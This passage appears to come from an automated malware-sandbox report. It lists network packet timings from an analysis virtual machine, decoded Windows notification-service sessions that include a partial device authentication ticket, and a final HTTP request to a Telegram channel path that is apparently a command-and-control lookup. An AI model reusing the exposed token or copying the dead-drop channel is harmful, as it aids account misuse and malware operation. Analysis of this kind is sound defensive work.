Dec 31, 2024 09:46:33.107273102 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.415920973 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.549962044 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.550427914 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.550575018 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.550663948 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.552503109 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.553066969 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.553180933 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.553642988 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.553793907 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.554192066 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.554339886 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.554761887 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.555104017 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.646274090 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.646334887 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.646342993 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.646352053 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.648022890 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.648878098 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.649189949 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.649354935 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.649405003 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.649480104 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.649749041 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.649816036 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.651068926 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.651611090 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.678258896 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.703850031 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.704376936 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.704546928 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.742527008 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.774734974 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:33.797663927 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:33.939434052 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.227022886 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.228065014 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.240139008 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.248207092 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.248352051 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.288212061 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.288479090 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.293788910 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.293935061 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.321535110 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.322206974 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.323153019 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.342510939 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.343147039 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.343908072 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.344000101 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.345482111 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.345541954 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.361998081 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.382678032 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.383330107 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.383544922 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.385140896 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.385376930 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.385421038 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.387676001 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.387981892 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.387993097 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.388004065 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.388932943 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.389156103 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.391093016 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.391415119 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.391513109 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.391733885 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.392441988 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.392575026 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.417803049 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.439256907 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.466129065 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.488711119 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.488734007 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.488743067 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.488750935 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.490168095 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.490252018 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.490825891 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.520073891 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.523952007 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.525278091 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.587490082 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:34.620884895 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:34.855470896 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.856430054 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:34.949394941 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.949888945 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.950289965 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.950809956 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:34.951000929 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.138359070 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.138998985 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.232306004 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.232609987 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.232902050 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.233239889 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.239650965 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.398555994 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.398663998 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.411226988 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:35.411576986 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:35.492878914 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.493817091 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.493941069 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.494344950 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.509645939 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:35.511378050 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:35.511682034 CET	443	62351	162.159.61.3	192.168.2.5
Dec 31, 2024 09:46:35.512048006 CET	62351	443	192.168.2.5	162.159.61.3
Dec 31, 2024 09:46:35.817914009 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.818249941 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.820735931 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.820918083 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.821264982 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.821784019 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.912395000 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.913175106 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.913872004 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.914185047 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.914725065 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.915095091 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.915664911 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.916028976 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.916269064 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:35.917099953 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.924072981 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.924335957 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.944974899 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:35.945064068 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:36.012048960 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:36.018388987 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:36.019048929 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:36.019352913 CET	60337	443	192.168.2.5	172.64.41.3
Dec 31, 2024 09:46:36.019511938 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:36.038295984 CET	443	60337	172.64.41.3	192.168.2.5
Dec 31, 2024 09:46:36.039688110 CET	60337	443	192.168.2.5	172.64.41.3

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:45:13 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 44 75 59 36 39 71 67 54 75 45 47 59 4b 32 4e 76 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 33 31 62 32 32 63 63 61 63 31 64 39 33 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: DuY69qgTuEGYK2Nv.1Context: 5831b22ccac1d93
2024-12-31 08:45:13 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-31 08:45:13 UTC	1083	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 44 75 59 36 39 71 67 54 75 45 47 59 4b 32 4e 76 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 33 31 62 32 32 63 63 61 63 31 64 39 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44 56 Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: DuY69qgTuEGYK2Nv.2Context: 5831b22ccac1d93<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTDV
2024-12-31 08:45:13 UTC	217	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 44 75 59 36 39 71 67 54 75 45 47 59 4b 32 4e 76 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 33 31 62 32 32 63 63 61 63 31 64 39 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 196MS-CV: DuY69qgTuEGYK2Nv.3Context: 5831b22ccac1d93<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-31 08:45:13 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-31 08:45:13 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 79 63 69 55 6e 2b 64 61 6f 45 57 37 77 61 62 6e 64 6b 4e 4e 54 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: yciUn+daoEW7wabndkNNTw.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:45:23 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 76 30 55 35 44 33 6d 52 55 75 78 41 48 4f 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 32 37 37 64 62 66 63 33 64 64 33 36 39 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: iv0U5D3mRUuxAHO/.1Context: 29277dbfc3dd3698
2024-12-31 08:45:23 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-31 08:45:23 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 69 76 30 55 35 44 33 6d 52 55 75 78 41 48 4f 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 32 37 37 64 62 66 63 33 64 64 33 36 39 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: iv0U5D3mRUuxAHO/.2Context: 29277dbfc3dd3698<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTD
2024-12-31 08:45:23 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 76 30 55 35 44 33 6d 52 55 75 78 41 48 4f 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 32 37 37 64 62 66 63 33 64 64 33 36 39 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: iv0U5D3mRUuxAHO/.3Context: 29277dbfc3dd3698<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-31 08:45:23 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-31 08:45:23 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 46 49 76 4d 47 52 58 6d 45 45 2b 68 39 71 64 64 71 2b 37 76 62 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: FIvMGRXmEE+h9qddq+7vbg.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:45:42 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 58 31 37 41 64 56 61 49 30 2b 2f 31 39 48 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 61 30 37 64 30 39 61 34 62 33 32 35 30 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: IX17AdVaI0+/19Hp.1Context: 98a07d09a4b32501
2024-12-31 08:45:42 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-31 08:45:42 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 49 58 31 37 41 64 56 61 49 30 2b 2f 31 39 48 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 61 30 37 64 30 39 61 34 62 33 32 35 30 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: IX17AdVaI0+/19Hp.2Context: 98a07d09a4b32501<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTD
2024-12-31 08:45:42 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 49 58 31 37 41 64 56 61 49 30 2b 2f 31 39 48 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 61 30 37 64 30 39 61 34 62 33 32 35 30 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: IX17AdVaI0+/19Hp.3Context: 98a07d09a4b32501<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-31 08:45:42 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-31 08:45:42 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 48 7a 6a 75 70 6c 43 31 4a 45 4f 6f 55 37 71 74 6c 64 4b 66 65 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: HzjuplC1JEOoU7qtldKfew.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:03 UTC	85	OUT	GET /w211et HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
